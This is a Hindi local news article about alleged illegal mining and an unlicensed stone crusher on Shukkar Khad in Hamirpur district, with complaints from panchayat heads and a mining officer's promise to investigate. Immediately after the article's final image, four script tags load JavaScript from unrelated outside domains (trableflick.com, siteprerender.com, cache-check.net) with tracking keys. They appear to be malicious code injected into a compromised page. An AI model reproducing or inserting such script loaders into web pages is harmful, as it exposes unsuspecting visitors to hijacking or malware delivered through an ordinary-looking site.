Categories: हिमाचल

हमीरपुरः सरकार के नियमों को ताक पर रखकर पीले पंजे से किया जा रहा शुक्कर खड्ड में खनन

<p>हमीरपुर जिला के घोडी धबीरी के पास शुक्कर खडड में सरकार के मानको को ताक पर रखकर जेसीबी के माध्यम से खनन किया जा रहा है जिसके चलते चार पंचायतों के लोग प्रभावित हो रहे है। अवैध तरीके से हो रहे खनन के चलते पेयजल योजनाओं के साथ पानी का स्तर भी गिरता जा रहा है तो बिलासपुर जिला को जोडने वाले पुल की नींव भी खतरे में है। इसके साथ ही खड्ड के साथ लगती हजारों कनाल भूमि भी कटान की वजह से हर बार बह जाती है जिससे खेतीबाडी पर खतरे के बादल छाए हुए है।</p>

<p>बता दें कि बड़सर उपमंडल के घोड़ी धबीरी के पास शुक्रर खड्ड पर स्थापित शुक्रर स्टोन क्रशर के विरोध में तीन पंचायतों के प्रतिनिधियों और स्थानीय लोगों ने विरोध दर्ज करवाया। तीन पंचायत के प्रतिनिधियों में ग्राम पंचायत बड़ा ग्रां की प्रधान बलराम, जमली पंचायत की प्रधान अनुराधा, वार्ड पंच श्याम सिंह, धर्म सिंह, तथा घोड़ी धबीरी पंचायत के प्रधान रविद्र सिंह सहित उपप्रधान और सदस्य जबकि जमली पंचायत के पूर्व प्रधान दीनानाथ सहित स्थानीय लोग शामिल थे। उक्त लोगों ने यहां स्थापित शुक्रर स्टोन क्रशर का जमकर विरोध किया।</p>

<p>पंचायत प्रतिनिधियों और लोगों का आरोप है कि शुक्र स्टोन क्रशर अवैध तरीके से स्थापित किया गया है। इस मामले की जांच जिला प्रशासन और खनन विभाग को समय रहते करनी चाहिए, अन्यथा स्थानीय लोग बड़ा आंदोलन छेड़ेंगे। अवैध खनन करने से उनकी जमीन को भारी नुकसान हो रहा है। उन्होंने आरोप लगाया कि स्टोन क्रशर स्थापित करते समय सभी नियमों और शर्तों को दरकिनार किया गया है जिसका खमियाजा आज लोगों को भुगतना पड़ रहा है। वहीं, स्थनीय लोगों का कहना है कि इस अवैध खनन से शुक्र खड्ड पर स्थापित चार पेयजल योजनाएं प्रभावित हो रही हैं और साथ ही गावों के लिए स्थापित हैंडपंपो के पानी का जलस्तर कम हुआ है। उन्होंने बताया कि हमीरपुर व बिलासुपर को जोड़ने वाले नदी के उपर बने पुल को अवैध खनन से खतरा पैदा हो गया है। किसानों की भूमि का कटाव हो रहा है और खनन माफिया रात के अंधेरे जेसीबी लगाकर खनन कर रहा है।</p>

<p><img src=”/media/gallery/images/image(2329).png” style=”height:110px; width:900px” /></p>

<p>जमली पंचायत की प्रधान अनुराधा देवी ने कहा कि सरकार और प्रशासन को शीघ्र इस क्रशर को बंद कर देना चाहिए। उन्होंने उपायुक्त हमीरपुर देबाश्वेता बानिक से मांग की है कि शीघ्र इस स्टोन क्रशर मामले की जांच करवाएं अन्यथा तीनों पंचायत के लोग जिला मुख्यालय पर प्रदर्शन करने के लिए मजबूर होंगे। उक्त प्रतिनिधियों और लोगों ने मुख्यमंत्री जयराम ठाकुर से भी अवैध खनन पर रोक लगाने का आग्रह किया है। वहीं, बड़ा ग्रां पंचायत के वार्ड पंच श्याम सिंह का कहना है कि अवैध खनन के चलते पानी की स्कीमें प्रभावित हो रही हैं जल्द से जल्द क्रशर को बंद किया जाए। इसके अलावा क्रशर में मौजूद कर्मचारी करन राणा का कहना है कि हमारे पास खनन करने के लिए एम फॉर्म उपलब्ध है जो सरकार द्वारा जारी है। उसी के तहत क्रशर में काम किया जा रहा है। गांव वाले हर रोज हमें खनन को लेकर परेशान कर रहे हैं। जिला खनन अधिकारी हरविंदर सिह ने बताया कि मामले की गहनता से जांच की जाएगी और अगर ऐसा मामला है तो मौके पर जाकर निरीक्षण कर स्थिति का जायजा लिया जाएगा। साथ ही गैर कानूनी तरीके से खनन करने पर सख्त कार्रवाई अमल में लाई जाएगी।</p>

<p><img src=”/media/gallery/images/image(8300).jpeg” style=”height:570px; width:341px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1613206832591″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

24 mins ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

56 mins ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

1 hour ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

2 hours ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

3 hours ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

3 hours ago